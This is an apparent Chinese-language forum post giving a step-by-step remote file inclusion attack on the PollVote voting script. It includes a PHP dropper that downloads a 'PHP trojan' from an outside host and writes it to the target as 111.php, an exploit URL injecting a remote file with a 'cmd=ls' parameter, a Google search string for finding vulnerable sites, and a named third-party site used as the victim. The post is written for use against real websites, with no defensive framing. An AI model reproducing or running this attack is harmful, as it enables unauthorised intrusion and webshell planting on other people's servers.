PollVote是一个投票系统，今天看了非安全的杂志，看了利用方法，

不过作者说利用过程的时候很烦琐，关键的时候又没说明白，

简单的说一下``

首先建立2个文本分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?

$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");

$ff=fopen("111.php","a");

fwrite($ff,$f);

fclose($ff);

?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com搜索关键词"pollvote.php?pollname"

有很多，

搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了，

刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行http://www.skinnyturd.co.uk/poll...o.com/creatfile.txt

这样

phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php